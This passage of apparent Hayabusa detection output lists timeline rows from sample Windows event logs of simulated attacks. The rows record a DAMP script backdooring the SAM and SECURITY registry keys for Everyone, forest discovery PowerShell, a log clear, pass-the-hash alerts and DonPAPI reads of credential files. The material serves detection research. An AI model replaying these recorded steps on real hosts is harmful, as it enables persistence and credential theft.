key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; 
value=""[FS03 : SECURITY] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.603 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 
+09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): 
name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 
2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Backdooring completed for system""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""PSObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""ComputerName"" ParameterBinding(Add-Member): name=""Value""; value=""FS03"" ParameterBinding(Add-Member): name=""InputObject""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry 
permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""BackdoorTrustee"" ParameterBinding(Add-Member): name=""Value""; value=""S-1-1-0"" ParameterBinding(Add-Member): name=""InputObject""; value=""@{ComputerName=FS03}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""@{ComputerName=FS03; BackdoorTrustee=S-1-1-0}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"foreach ($s in [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites ){write-host ""[>] (site) $s"";foreach ($r in $s.Subnets){write-host "" └─> (subnet) $r"";foreach ($m in $s.Servers){write-host "" └─> (server) $m""}}}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): 
""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) OFFSEC-PREMISE""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) LONDON""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" 2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 
10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 
16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:15:56.829 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 